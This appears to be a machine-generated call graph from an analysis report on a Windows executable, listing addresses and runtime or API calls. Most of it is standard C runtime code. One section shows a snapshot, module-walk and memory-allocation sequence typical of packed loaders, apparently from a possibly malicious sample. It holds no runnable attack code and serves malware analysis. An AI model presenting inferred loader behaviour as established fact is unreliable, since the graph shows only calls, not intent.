18545->18530 18548 42381e CloseHandle 18546->18548 18548->18530 18551 423847 18548->18551 18550 4237cd 18550->18540 18550->18541 18553 41c830 __dosmaperr 14 API calls 18551->18553 18555 42384c 18553->18555 18554 4238c4 18559 4238cb 18554->18559 18686 423145 18554->18686 18555->18530 18671 41e7d4 18559->18671 18560 423907 18560->18537 18562 423983 CloseHandle 18560->18562 18712 423398 CreateFileW 18562->18712 18563 4238d2 18563->18537 18565 4239ae 18565->18563 18566 4239b8 GetLastError 18565->18566 18567 41c7fa __dosmaperr 14 API calls 18566->18567 18568 4239c4 18567->18568 18713 4200bf 18568->18713 18573 41f1c6 18570->18573 18574 41f2f5 _unexpected 5 API calls 18573->18574 18575 41f1dc 18574->18575 18575->18518 18577 41bce6 18576->18577 18578 41bccc 18576->18578 18579 41bced 18577->18579 18580 41bd0c 18577->18580 18594 41be4f 18578->18594 18593 41bcd6 18579->18593 18598 41be69 18579->18598 18582 41ebb8 __fassign MultiByteToWideChar 18580->18582 18584 41bd1b 18582->18584 18585 41bd22 GetLastError 18584->18585 18587 41bd48 18584->18587 18590 41be69 __wsopen_s 15 API calls 18584->18590 18603 41c7fa 18585->18603 18588 41ebb8 __fassign MultiByteToWideChar 18587->18588 18587->18593 18591 41bd5f 18588->18591 18590->18587 18591->18585 18591->18593 18592 41c830 __dosmaperr 14 API calls 18592->18593 18593->18507 18593->18523 18595 41be5a 18594->18595 18597 41be62 18594->18597 18596 41e681 _free 14 API calls 18595->18596 18596->18597 18597->18593 18599 41be4f __wsopen_s 14 API calls 18598->18599 18600 41be77 18599->18600 18608 41bea8 18600->18608 18611 41c81d 18603->18611 18605 41c805 __dosmaperr 18606 41c830 __dosmaperr 14 API calls 18605->18606 18607 41bd2e 18606->18607 18607->18592 18609 41eb6a __wsopen_s 15 API calls 18608->18609 18610 41be88 18609->18610 18610->18593 18612 41f0cb __dosmaperr 14 API calls 18611->18612 18613 41c822 18612->18613 18613->18605 18615 423468 18614->18615 18616 42344e 18614->18616 18722 4233bd 18615->18722 18616->18615 18618 41c830 __dosmaperr 14 API calls 18616->18618 18619 42345d 18618->18619 18620 41cd0c __wsopen_s 25 API calls 18619->18620 18620->18615 18621 4234a0 18622 4234cf 18621->18622 18624 41c830 __dosmaperr 14 API calls 18621->18624 18629 423522 18622->18629 18729 41daaf 18622->18729 18626 4234c4 18624->18626 18625 42351d 18627 42359a 18625->18627 18625->18629 18628 41cd0c __wsopen_s 25 API calls 18626->18628 18630 41cd39 __wsopen_s 11 API calls 18627->18630 18628->18622 18629->18526 18629->18527 18631 4235a6 18630->18631 18633 41ffb8 ___scrt_is_nonwritable_in_current_image 18632->18633 18736 41df83 EnterCriticalSection 18633->18736 18635 41ffe4 18740 41fd86 18635->18740 18636 41ffbf 18636->18635 18641 420053 EnterCriticalSection 18636->18641 18643 420006 18636->18643 18642 420060 LeaveCriticalSection 18641->18642 18641->18643 18642->18636 18737 4200b6 18643->18737 18645->18544 18646->18550 18648 41ff06 18647->18648 18649 41ff6f 18647->18649 18648->18649 18655 41ff2c __wsopen_s 18648->18655 18650 41c830 __dosmaperr 14 API calls 18649->18650 18651 41ff74 18650->18651 18652 41c81d __dosmaperr 14 API calls 18651->18652 18653 41ff5c 18652->18653 18653->18554 18656 4235a7 18653->18656 18654 41ff56 SetStdHandle 18654->18653 18655->18653 18655->18654 18657 4235cf 18656->18657 18669 423601 18656->18669 18657->18669 18754 426a9e 18657->18754 18660 423605 18757 426672 18660->18757 18661 4235ef 18662 41c81d __dosmaperr 14 API calls 18661->18662 18668 4235f4 18662->18668 18665 426a9e __wsopen_s 27 API calls 18665->18668 18666 41c830 __dosmaperr 14 API calls 18666->18669 18668->18666 18668->18669 18669->18554 18670 42362d 18670->18665 18670->18668 18672 420150 __wsopen_s 25 API calls 18671->18672 18675 41e7e4 18672->18675 18673 41e7ea 18674 4200bf __wsopen_s 15 API calls 18673->18674 18680 41e842 18674->18680 18675->18673 18677 420150 __wsopen_s 25 API calls 18675->18677 18685 41e81c 18675->18685 18676 420150 __wsopen_s 25 API calls 18678 41e828 CloseHandle 18676->18678 18681 41e813 18677->18681 18678->18673 18682 41e834 GetLastError 18678->18682 18679 41e864 18679->18563 18680->18679 18683 41c7fa __dosmaperr 14 API calls 18680->18683 18684 420150 __wsopen_s 25 API calls 18681->18684 18682->18673 18683->18679 18684->18685 18685->18673 18685->18676 18687 4232d1 18686->18687 18688 423175 18686->18688 18687->18559 18687->18560 18689 41daaf __wsopen_s 25 API calls 18688->18689 18694 423195 18688->18694 18690 42318c 18689->18690 18691 42338d 18690->18691 18690->18694 18692 41cd39 __wsopen_s 11 API calls 18691->18692 18693 423397 18692->18693 18694->18687 18696 423249 18694->18696 18697 426a9e __wsopen_s 27 API calls 18694->18697 18695 426672 __wsopen_s 37 API calls 18700 42326e 18695->18700 18696->18687 18696->18695 18709 4232cc 18696->18709 18711 42329c 18696->18711 18698 4232b0 18697->18698 18701 426a9e __wsopen_s 27 API calls 18698->18701 18698->18711 18699 41c830 __dosmaperr 14 API calls 18699->18687 18702 4232fa 18700->18702 18703 4232ed 18700->18703 18704 42331c 18700->18704 18700->18709 18700->18711 18701->18696 18702->18704 18707 423301 18702->18707 18706 41c830 __dosmaperr 14 API calls 18703->18706 18705 426a9e __wsopen_s 27 API calls 18704->18705 18705->18711 18706->18709 18710 426a9e __wsopen_s 27 API calls 18707->18710 18709->18699 18710->18711 18711->18687 18711->18709 19022 4242a1 18711->19022 18712->18565 18714 420135 18713->18714 18715 4200ce 18713->18715 18716 41c830 __dosmaperr 14 API calls 18714->18716 18715->18714 18721 4200f8 __wsopen_s 18715->18721 18717 42013a 18716->18717 18718 41c81d __dosmaperr 14 API calls 18717->18718 18719 420125 18718->18719 18719->18563 18720 42011f SetStdHandle 18720->18719 18721->18719 18721->18720 18723 4233d5 18722->18723 18724 4233f0 18723->18724 18725 41c830 __dosmaperr 14 API calls 18723->18725 18724->18621 18726 423414 18725->18726 18727 41cd0c __wsopen_s 25 API calls 18726->18727 18728 42341f 18727->18728 18728->18621 18730 41dad0 18729->18730 18731 41dabb 18729->18731 18730->18625 18732 41c830 __dosmaperr 14 API calls 18731->18732 18733 41dac0 18732->18733 18734 41cd0c __wsopen_s 25 API calls 18733->18734 18735 41dacb 18734->18735 18735->18625 18736->18636 18748 41dfcb LeaveCriticalSection 18737->18748 18739 420026 18739->18532 18739->18533 18741 420955 _unexpected 14 API calls 18740->18741 18744 41fd98 18741->18744 18742 41fda5 18743 41e681 _free 14 API calls 18742->18743 18745 41fdfa 18743->18745 18744->18742 18749 41f533 18744->18749 18745->18643 18747 41fed4 EnterCriticalSection 18745->18747 18747->18643 18748->18739 18750 41f2f5 _unexpected 5 API calls 18749->18750 18751 41f54f 18750->18751 18752 41f56d InitializeCriticalSectionAndSpinCount 18751->18752 18753 41f558 18751->18753 18752->18753 18753->18744 18855 426a22 18754->18855 18758 426684 18757->18758 18759 42669c 18757->18759 18760 41c81d __dosmaperr 14 API calls 18758->18760 18761 426a03 18759->18761 18766 4266dc 18759->18766 18762 426689 18760->18762 18763 41c81d __dosmaperr 14 API calls 18761->18763 18764 41c830 __dosmaperr 14 API calls 18762->18764 18765 426a08 18763->18765 18770 423617 18764->18770 18768 41c830 __dosmaperr 14 API calls 18765->18768 18767 4266e7 18766->18767 18766->18770 18775 426716 18766->18775 18769 41c81d __dosmaperr 14 API calls 18767->18769 18771 4266f4 18768->18771 18772 4266ec 18769->18772 18770->18670 18820 425ffe 18770->18820 18773 41cd0c __wsopen_s 25 API calls 18771->18773 18774 41c830 __dosmaperr 14 API calls 18772->18774 18773->18770 18774->18771 18776 42672f 18775->18776 18777 426786 18775->18777 18778 42674a 18775->18778 18776->18778 18783 426734 18776->18783 18780 41eb6a __wsopen_s 15 API calls 18777->18780 18779 41c81d __dosmaperr 14 API calls 18778->18779 18781 42674f 18779->18781 18784 42679d 18780->18784 18785 41c830 __dosmaperr 14 API calls 18781->18785 18877 42532b 18783->18877 18788 41e681 _free 14 API calls 18784->18788 18786 426756 18785->18786 18789 41cd0c __wsopen_s 25 API calls 18786->18789 18787 4268dd 18790 426953 18787->18790 18793 4268f6 GetConsoleMode 18787->18793 18791 4267a6 18788->18791 18819 426761 __wsopen_s 18789->18819 18792 426957 ReadFile 18790->18792 18794 41e681 _free 14 API calls 18791->18794 18795 426971 18792->18795 18796 4269cb GetLastError 18792->18796 18793->18790 18797 426907 18793->18797 18798 4267ad 18794->18798 18795->18796 18801 426948 18795->18801 18799 4269d8 18796->18799 18800 42692f 18796->18800 18797->18792 18802 42690d ReadConsoleW 18797->18802 18803 4267d2 18798->18803 18804 4267b7 18798->18804 18805 41c830 __dosmaperr 14 API calls 18799->18805 18812 41c7fa __dosmaperr 14 API calls 18800->18812 18800->18819 18815 426996 18801->18815 18816 4269ad 18801->18816 18801->18819 18802->18801 18807 426929 GetLastError 18802->18807 18806 426a9e __wsopen_s 27 API calls 18803->18806 18809 41c830 __dosmaperr 14 API calls 18804->18809 18811 4269dd 18805->18811 18806->18783 18807->18800 18808 41e681 _free 14 API calls 18808->18770 18810 4267bc 18809->18810 18813 41c81d __dosmaperr 14 API calls 18810->18813 18814 41c81d __dosmaperr 14 API calls 18811->18814 18812->18819 18813->18819 18814->18819 18886 4264a0 18815->18886 18816->18819 18899 4262cf 18816->18899 18819->18808 18909 425fb1 18820->18909 18823 42614d 18824 41c830 __dosmaperr 14 API calls 18823->18824 18825 4260d3 18824->18825 18828 426a9e __wsopen_s 27 API calls 18825->18828 18826 426a9e __wsopen_s 27 API calls 18829 426117 18826->18829 18827 426054 18831 420955 _unexpected 14 API calls 18827->18831 18833 426164 18828->18833 18829->18823 18835 420150 __wsopen_s 25 API calls 18829->18835 18830 4260ff 18830->18825 18830->18826 18832 426060 18831->18832 18834 426068 18832->18834 18848 426075 __wsopen_s 18832->18848 18833->18670 18836 41c830 __dosmaperr 14 API calls 18834->18836 18837 426127 SetEndOfFile 18835->18837 18838 42606d 18836->18838 18837->18825 18839 426133 18837->18839 18842 41c830 __dosmaperr 14 API calls 18838->18842 18840 41c830 __dosmaperr 14 API calls 18839->18840 18841 426138 18840->18841 18844 41c81d __dosmaperr 14 API calls 18841->18844 18843 4260f4 18842->18843 18846 41e681 _free 14 API calls 18843->18846 18845 426143 GetLastError 18844->18845 18845->18823 18846->18825 18849 4260da 18848->18849 18851 4260c4 __wsopen_s 18848->18851 18914 424393 18848->18914 18850 41c81d __dosmaperr 14 API calls 18849->18850 18852 4260df 18850->18852 18854 41e681 _free 14 API calls 18851->18854 18852->18838 18853 41c830 __dosmaperr 14 API calls 18852->18853 18853->18838 18854->18825 18864 420150 18855->18864 18857 426a34 18858 426a3c 18857->18858 18859 426a4d SetFilePointerEx 18857->18859 18860 41c830 __dosmaperr 14 API calls 18858->18860 18861 4235df 18859->18861 18862 426a65 GetLastError 18859->18862 18860->18861 18861->18660 18861->18661 18863 41c7fa __dosmaperr 14 API calls 18862->18863 18863->18861 18865 420172 18864->18865 18866 42015d 18864->18866 18868 41c81d __dosmaperr 14 API calls 18865->18868 18872 420197 18865->18872 18867 41c81d __dosmaperr 14 API calls 18866->18867 18869 420162 18867->18869 18870 4201a2 18868->18870 18871 41c830 __dosmaperr 14 API calls 18869->18871 18873 41c830 __dosmaperr 14 API calls 18870->18873 18874 42016a 18871->18874 18872->18857 18875 4201aa 18873->18875 18874->18857 18876 41cd0c __wsopen_s 25 API calls 18875->18876 18876->18874 18878 425345 18877->18878 18879 425338 18877->18879 18881 425351 18878->18881 18882 41c830 __dosmaperr 14 API calls 18878->18882 18880 41c830 __dosmaperr 14 API calls 18879->18880 18883 42533d 18880->18883 18881->18787 18884 425372 18882->18884 18883->18787 18885 41cd0c __wsopen_s 25 API calls 18884->18885 18885->18883 18904 42616e 18886->18904 18888 41ebb8 __fassign MultiByteToWideChar 18890 4265b4 18888->18890 18893 4265bd GetLastError 18890->18893 18897 4264e8 18890->18897 18891 426542 18895 4264fc 18891->18895 18898 426a9e __wsopen_s 27 API calls 18891->18898 18892 426532 18894 41c830 __dosmaperr 14 API calls 18892->18894 18896 41c7fa __dosmaperr 14 API calls 18893->18896 18894->18897 18895->18888 18896->18897 18897->18819 18898->18895 18901 42630a 18899->18901 18900 426472 18900->18819 18901->18900 18902 42639b ReadFile 18901->18902 18903 426a9e __wsopen_s 27 API calls 18901->18903 18902->18901 18903->18901 18907 4261a2 18904->18907 18905 4262a9 18905->18891 18905->18892 18905->18895 18905->18897 18906 426211 ReadFile 18906->18907 18907->18905 18907->18906 18908 426a9e __wsopen_s 27 API calls 18907->18908 18908->18907 18910 426a9e __wsopen_s 27 API calls 18909->18910 18911 425fca 18910->18911 18912 426a9e __wsopen_s 27 API calls 18911->18912 18913 425fd9 18912->18913 18913->18823 18913->18827 18913->18830 18915 4243b5 18914->18915 18953 4243d1 18914->18953 18916 4243b9 18915->18916 18918 424409 18915->18918 18917 41c81d __dosmaperr 14 API calls 18916->18917 18919 4243be 18917->18919 18920 42441c 18918->18920 18922 426a9e __wsopen_s 27 API calls 18918->18922 18921 41c830 __dosmaperr 14 API calls 18919->18921 18956 423f3a 18920->18956 18924 4243c6 18921->18924 18922->18920 18926 41cd0c __wsopen_s 25 API calls 18924->18926 18926->18953 18927 424432 18931 424436 18927->18931 18932 42445b 18927->18932 18928 424471 18929 424485 18928->18929 18930 4244ca WriteFile 18928->18930 18933 424490 18929->18933 18934 4244ba 18929->18934 18935 4244ee GetLastError 18930->18935 18937 424451 18930->18937 18931->18937 18963 423ed2 18931->18963 18968 423b28 GetConsoleCP 18932->18968 18938 424495 18933->18938 18939 4244aa 18933->18939 18996 423fab 18934->18996 18935->18937 18943 424514 18937->18943 18944 42453e 18937->18944 18937->18953 18938->18937 18981 424086 18938->18981 18988 42416f 18939->18988 18946 424532 18943->18946 18947 42451b 18943->18947 18948 41c830 __dosmaperr 14 API calls 18944->18948 18944->18953 18950 41c7fa __dosmaperr 14 API calls 18946->18950 18949 41c830 __dosmaperr 14 API calls 18947->18949 18951 424556 18948->18951 18952 424520 18949->18952 18950->18953 18954 41c81d __dosmaperr 14 API calls 18951->18954 18955 41c81d __dosmaperr 14 API calls 18952->18955 18953->18848 18954->18953 18955->18953 18957 42532b __wsopen_s 25 API calls 18956->18957 18958 423f4b 18957->18958 18959 423fa1 18958->18959 18960 41ef74 _unexpected 37 API calls 18958->18960 18959->18927 18959->18928 18961 423f6e 18960->18961 18961->18959 18962 423f88 GetConsoleMode 18961->18962 18962->18959 18966 423ef4 18963->18966 18967 423f29 18963->18967 18964 426ab9 5 API calls __wsopen_s 18964->18966 18965 423f2b GetLastError 18965->18967 18966->18964 18966->18965 18966->18967 18967->18937 18969 41bd8d __fassign 37 API calls 18968->18969 18975 423b84 __wsopen_s 18969->18975 18970 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18972 423ed0 18970->18972 18971 41f6ef __wsopen_s 37 API calls 18971->18975 18972->18937 18973 42078b 38 API calls __fassign 18973->18975 18974 423e24 18974->18970 18975->18971 18975->18973 18975->18974 18978 423da7 WriteFile 18975->18978 18980 423ddf WriteFile 18975->18980 19003 425211 18975->19003 19013 4219a1 18975->19013 18978->18975 18979 423ea0 GetLastError 18978->18979 18979->18974 18980->18975 18980->18979 18985 424095 __wsopen_s 18981->18985 18982 424154 18984 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18982->18984 18983 42410a WriteFile 18983->18985 18986 424156 GetLastError 18983->18986 18987 42416d 18984->18987 18985->18982 18985->18983 18986->18982 18987->18937 18994 42417e __wsopen_s 18988->18994 18989 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18990 42429f 18989->18990 18990->18937 18991 4219a1 __wsopen_s WideCharToMultiByte 18991->18994 18992 424288 GetLastError 18995 424286 18992->18995 18993 42423d WriteFile 18993->18992 18993->18994 18994->18991 18994->18992 18994->18993 18994->18995 18995->18989 18997 423fba __wsopen_s 18996->18997 19000 42402a WriteFile 18997->19000 19002 42406b 18997->19002 18998 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18999 424084 18998->18999 18999->18937 19000->18997 19001 42406d GetLastError 19000->19001 19001->19002 19002->18998 19011 4252c6 __wsopen_s 19003->19011 19012 42522a __wsopen_s 19003->19012 19005 426ca6 __fassign 19 API calls 19005->19011 19006 4252f6 19008 41c830 __dosmaperr 14 API calls 19006->19008 19007 4252b1 19009 41c830 __dosmaperr 14 API calls 19007->19009 19010 42529c 19008->19010 19009->19010 19010->18975 19011->19005 19011->19006 19011->19010 19012->19007 19012->19010 19016 426ca6 19012->19016 19014 4219ba WideCharToMultiByte 19013->19014 19014->18975 19017 426ccd 19016->19017 19020 42530c __fassign 14 API calls 19017->19020 19021 426cf2 19017->19021 19018 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19019 426e4b 19018->19019 19019->19012 19020->19021 19021->19018 19023 4242ad ___scrt_is_nonwritable_in_current_image 19022->19023 19024 4242b5 19023->19024 19026 4242cd 19023->19026 19025 41c81d __dosmaperr 14 API calls 19024->19025 19028 4242ba 19025->19028 19027 424368 19026->19027 19031 4242ff 19026->19031 19029 41c81d __dosmaperr 14 API calls 19027->19029 19030 41c830 __dosmaperr 14 API calls 19028->19030 19032 42436d 19029->19032 19046 4242c2 19030->19046 19047 41fed4 EnterCriticalSection 19031->19047 19034 41c830 __dosmaperr 14 API calls 19032->19034 19036 424375 19034->19036 19035 424305 19037 424321 19035->19037 19038 424336 19035->19038 19039 41cd0c __wsopen_s 25 API calls 19036->19039 19041 41c830 __dosmaperr 14 API calls 19037->19041 19040 424393 __wsopen_s 60 API calls 19038->19040 19039->19046 19042 424331 19040->19042 19043 424326 19041->19043 19048 424360 19042->19048 19044 41c81d __dosmaperr 14 API calls 19043->19044 19044->19042 19046->18711 19047->19035 19051 41ff89 LeaveCriticalSection 19048->19051 19050 424366 19050->19046 19051->19050 19052->18514 19053 6e3ec0 19054 6e3ecd 19053->19054 19056 6e3ece 19053->19056 19057 6e3edd 19056->19057 19060 6e466e 19057->19060 19061 6e4689 19060->19061 19062 6e4692 CreateToolhelp32Snapshot 19061->19062 19063 6e46ae Module32First 19061->19063 19062->19061 19062->19063 19064 6e46bd 19063->19064 19065 6e3ee6 19063->19065 19067 6e432d 19064->19067 19065->19054 19068 6e4358 19067->19068 19069 6e4369 VirtualAlloc 19068->19069 19070 6e43a1 19068->19070 19069->19070 19070->19070 19071 4187be 19072 4187ca ___scrt_is_nonwritable_in_current_image 19071->19072 19097 4184e4 19072->19097 19074 4187d1 19075 41892a 19074->19075 19083 4187fb ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 19074->19083 19146 418b47 IsProcessorFeaturePresent 19075->19146 19077 418931 19078 418937 19077->19078 19150 41badf 19077->19150 19080 41baa3 __InternalCxxFrameHandler 23 API calls 19078->19080 19081 41893f 19080->19081 19082 41881a 19083->19082 19086 41889b 19083->19086 19126 41bab9 19083->19126 19105 41d50b 19086->19105 19087 4188a1 19109 416920 19087->19109 19098 4184ed 19097->19098 19153 418967 IsProcessorFeaturePresent 19098->19153 19102 4184fe 19103 418502 19102->19103 19163 41954f 19102->19163 19103->19074 19106 41d514 19105->19106 19108 41d519 19105->19108 19224 41d26f 19106->19224 19108->19087 19440 40b320 19109->19440 19111 41692e 19468 40ae50 19111->19468 19127 41dd4b ___scrt_is_nonwritable_in_current_image 19126->19127 19128 41bacf _unexpected 19126->19128 19129 41ef74 _unexpected 37 API calls 19127->19129 19128->19086 19132 41dd5c 19129->19132 19130 41dde6 IsInExceptionSpec 37 API calls 19131 41dd86 19130->19131 19133 41ddc5 19131->19133 19134 41c830 __dosmaperr 14 API calls 19131->19134 19132->19130 19133->19086 19135 41ddbb 19134->19135 19136 41cd0c __wsopen_s 25 API calls 19135->19136 19136->19133 19147 418b5c ___scrt_fastfail 19146->19147 19148 418c07 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19147->19148 19149 418c52 ___scrt_fastfail 19148->19149 19149->19077 19151 41b97d __InternalCxxFrameHandler 23 API calls 19150->19151 19152 41baf0 19151->19152 19152->19078 19154 4184f9 19153->19154 19155 419530 19154->19155 19169 41a799 19155->19169 19159 419541 19160 41954c 19159->19160 19183 41a7d5 19159->19183 19160->19102 19162 419539 19162->19102 19164 419562 19163->19164 19165 419558 19163->19165 19164->19103 19166 419995 ___vcrt_uninitialize_ptd 6 API calls 19165->19166 19167 41955d 19166->19167 19168 41a7d5 ___vcrt_uninitialize_locks DeleteCriticalSection 19167->19168 19168->19164 19170 41a7a2 19169->19170 19172 41a7cb 19170->19172 19173 419535 19170->19173 19187 41ab5b 19170->19187 19174 41a7d5 ___vcrt_uninitialize_locks DeleteCriticalSection 19172->19174 19173->19162 19175 419962 19173->19175 19174->19173 19205 41aa6c 19175->19205 19180 419992 19180->19159 19182 419977 19182->19159 19184 41a7ff 19183->19184 19185 41a7e0 19183->19185 19184->19162 19186 41a7ea DeleteCriticalSection 19185->19186 19186->19184 19186->19186 19192 41aa23 19187->19192 19190 41ab93 InitializeCriticalSectionAndSpinCount 19191 41ab7e 19190->19191 19191->19170 19193 41aa5e 19192->19193 19194 41aa3b 19192->19194 19193->19190 19193->19191 19194->19193 19198 41a977 19194->19198 19197 41aa50 GetProcAddress 19197->19193 19203 41a986 ___vcrt_InitializeCriticalSectionEx 19198->19203 19199 41aa18 19199->19193 19199->19197 19200 41a99f LoadLibraryExW 19201 41a9ba GetLastError 19200->19201 19200->19203 19201->19203 19202 41aa01 FreeLibrary 19202->19203 19203->19199 19203->19200 19203->19202 19204 41a9d9 LoadLibraryExW 19203->19204 19204->19203 19206 41aa23 ___vcrt_InitializeCriticalSectionEx 5 API calls 19205->19206 19207 41aa86 19206->19207 19208 41aa9f TlsAlloc 19207->19208 19209 41996c 19207->19209 19209->19182 19210 41ab1d 19209->19210 19211 41aa23 ___vcrt_InitializeCriticalSectionEx 5 API calls 19210->19211 19212 41ab37 19211->19212 19213 41ab52 TlsSetValue 19212->19213 19214 419985 19212->19214 19213->19214 19214->19180 19215 419995 19214->19215 19216 4199a5 19215->19216 19217 41999f 19215->19217 19216->19182 19219 41aaa7 19217->19219 19220 41aa23 ___vcrt_InitializeCriticalSectionEx 5 API calls 19219->19220 19221 41aac1 19220->19221 19222 41aad9 TlsFree 19221->19222 19223 41aacd 19221->19223 19222->19223 19223->19216 19225 41d278 19224->19225 19226 41d28e 19224->19226 19225->19226 19230 41d29b 19225->19230 19226->19108 19228 41d285 19228->19226 19243 41d3ed 19228->19243 19231 41d2a4 19230->19231 19232 41d2a7 19230->19232 19231->19228 19251 4216e4 19232->19251 19237 41d2b9 19240 41e681 _free 14 API calls 19237->19240 19241 41d2e8 19240->19241 19241->19228 19242 41e681 _free 14 API calls 19242->19237 19244 41d45e 19243->19244 19249 41d3fc 19243->19249 19244->19226 19245 420955 _unexpected 14 API calls 19245->19249 19246 41d462 19247 41e681 _free 14 API calls 19246->19247 19247->19244 19248 4219a1 WideCharToMultiByte __wsopen_s 19248->19249 19249->19244 19249->19245 19249->19246 19249->19248 19250 41e681 _free 14 API calls 19249->19250 19250->19249 19252 41d2ae 19251->19252 19253 4216ed 19251->19253 19257 421a85 GetEnvironmentStringsW 19252->19257 19288 41f031 19253->19288 19258 421af5 19257->19258 19259 421a9c 19257->19259 19260 41d2b3 19258->19260 19261 421afb FreeEnvironmentStringsW 19258->19261 19262 4219a1 __wsopen_s WideCharToMultiByte 19259->19262 19260->19237 19271 41d2ee 19260->19271 19261->19260 19263 421ab5 19262->19263 19263->19258 19264 421abf 19263->19264 19265 41eb6a __wsopen_s 15 API calls 19264->19265 19266 421ac5 19265->19266 19267 421add 19266->19267 19268 4219a1 __wsopen_s WideCharToMultiByte 19266->19268 19269 41e681 _free 14 API calls 19267->19269 19268->19267 19270 421af2 19269->19270 19270->19258 19272 41d303 19271->19272 19273 420955 _unexpected 14 API calls 19272->19273 19274 41d32a 19273->19274 19276 41d38f 19274->19276 19278 420955 _unexpected 14 API calls 19274->19278 19279 41d391 19274->19279 19281 41de2a ___std_exception_copy 25 API calls 19274->19281 19284 41d3b1 19274->19284 19286 41e681 _free 14 API calls 19274->19286 19275 41e681 _free 14 API calls 19277 41d2c4 19275->19277 19276->19275 19277->19242 19278->19274 19434 41d3be 19279->19434 19281->19274 19283 41e681 _free 14 API calls 19283->19276 19285 41cd39 __wsopen_s 11 API calls 19284->19285 19287 41d3bd 19285->19287 19286->19274 19289 41f042 19288->19289 19290 41f03c 19288->19290 19292 41f4f1 _unexpected 6 API calls 19289->19292 19312 41f048 19289->19312 19291 41f4b2 _unexpected 6 API calls 19290->19291 19291->19289 19293 41f05c 19292->19293 19295 420955 _unexpected 14 API calls 19293->19295 19293->19312 19294 41dde6 IsInExceptionSpec 37 API calls 19296 41f0ca 19294->19296 19297 41f06c 19295->19297 19298 41f074 19297->19298 19299 41f089 19297->19299 19302 41f4f1 _unexpected 6 API calls 19298->19302 19301 41f4f1 _unexpected 6 API calls 19299->19301 19300 41f0c1 19313 42152b 19300->19313 19303 41f095 19301->19303 19304 41f080 19302->19304 19305 41f099 19303->19305 19306 41f0a8 19303->19306 19307 41e681 _free 14 API calls 19304->19307 19308 41f4f1 _unexpected 6 API calls 19305->19308 19309 41eda0 _unexpected 14 API calls 19306->19309 19307->19312 19308->19304 19310 41f0b3 19309->19310 19311 41e681 _free 14 API calls 19310->19311 19311->19312 19312->19294 19312->19300 19314 421644 __fassign 37 API calls 19313->19314 19315 42153e 19314->19315 19332 4212d4 19315->19332 19318 421557 19318->19252 19319 41eb6a __wsopen_s 15 API calls 19320 421568 19319->19320 19328 42159a 19320->19328 19339 42173f 19320->19339 19323 41e681 _free 14 API calls 19325 4215a8 19323->19325 19324 421595 19326 41c830 __dosmaperr 14 API calls 19324->19326 19325->19252 19326->19328 19327 4215dc 19327->19328 19350 4211c6 19327->19350 19328->19323 19329 4215b0 19329->19327 19330 41e681 _free 14 API calls 19329->19330 19330->19327 19333 41bd8d __fassign 37 API calls 19332->19333 19334 4212e6 19333->19334 19335 421307 19334->19335 19336 4212f5 GetOEMCP 19334->19336 19337 42131e 19335->19337 19338 42130c GetACP 19335->19338 19336->19337 19337->19318 19337->19319 19338->19337 19340 4212d4 39 API calls 19339->19340 19341 42175f 19340->19341 19342 421799 IsValidCodePage 19341->19342 19347 4217d5 ___scrt_fastfail 19341->19347 19344 4217ab 19342->19344 19342->19347 19343 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19345 42158d 19343->19345 19346 4217da GetCPInfo 19344->19346 19349 4217b4 ___scrt_fastfail 19344->19349 19345->19324 19345->19329 19346->19347 19346->19349 19347->19343 19358 4213aa 19349->19358 19351 4211d2 ___scrt_is_nonwritable_in_current_image 19350->19351 19408 41df83 EnterCriticalSection 19351->19408 19353 4211dc 19409 421213 19353->19409 19359 4213d2 GetCPInfo 19358->19359 19360 42149b 19358->19360 19359->19360 19365 4213ea 19359->19365 19361 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19360->19361 19363 421529 19361->19363 19362 422551 40 API calls 19364 421452 19362->19364 19363->19347 19369 425bae 19364->19369 19365->19362 19368 425bae 41 API calls 19368->19360 19370 41bd8d __fassign 37 API calls 19369->19370 19371 425bc1 19370->19371 19374 4259c4 19371->19374 19375 4259df 19374->19375 19376 41ebb8 __fassign MultiByteToWideChar 19375->19376 19380 425a23 19376->19380 19377 425b88 19378 418232 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19377->19378 19379 421473 19378->19379 19379->19368 19380->19377 19381 41eb6a __wsopen_s 15 API calls 19380->19381 19384 425a48 __alloca_probe_16 19380->19384 19381->19384 19382 425aed 19386 422654 __freea 14 API calls 19382->19386 19383 41ebb8 __fassign MultiByteToWideChar 19385 425a8e 19383->19385 19384->19382 19384->19383 19385->19382 19402 41f57e 19385->19402 19386->19377 19389 425ac4 19389->19382 19392 41f57e 6 API calls 19389->19392 19390 425afc 19393 41eb6a __wsopen_s 15 API calls 19390->19393 19396 425b0e __alloca_probe_16 19390->19396 19391 425b79 19395 422654 __freea 14 API calls 19391->19395 19392->19382 19393->19396 19394 41f57e 6 API calls 19397 425b56 19394->19397 19395->19382 19396->19391 19396->19394 19397->19391 19398 4219a1 __wsopen_s WideCharToMultiByte 19397->19398 19399 425b70 19398->19399 19399->19391 19400 425ba5 19399->19400 19401 422654 __freea 14 API calls 19400->19401 19401->19382 19403 41f1fa LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 19402->19403 19404 41f589 19403->19404 19405 41f5db LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 19404->19405 19407 41f58f 19404->19407 19406 41f5cf LCMapStringW 19405->19406 19406->19407 19407->19382 19407->19389 19407->19390 19408->19353 19419 41fb3a 19409->19419 19411 421235 19412 41fb3a 25 API calls 19411->19412 19413 421254 19412->19413 19414 4211e9 19413->19414 19415 41e681 _free 14 API calls 19413->19415 19416 421207 19414->19416 19415->19414 19433 41dfcb LeaveCriticalSection 19416->19433 19418 4211f5 19418->19328 19420 41fb4b 19419->19420 19429 41fb47 __wsopen_s 19419->19429 19421 41fb52 19420->19421 19424 41fb65 ___scrt_fastfail 19420->19424 19422 41c830 __dosmaperr 14 API calls 19421->19422 19423 41fb57 19422->19423 19425 41cd0c __wsopen_s 25 API calls 19423->19425 19426 41fb93 19424->19426 19427 41fb9c 19424->19427 19424->19429 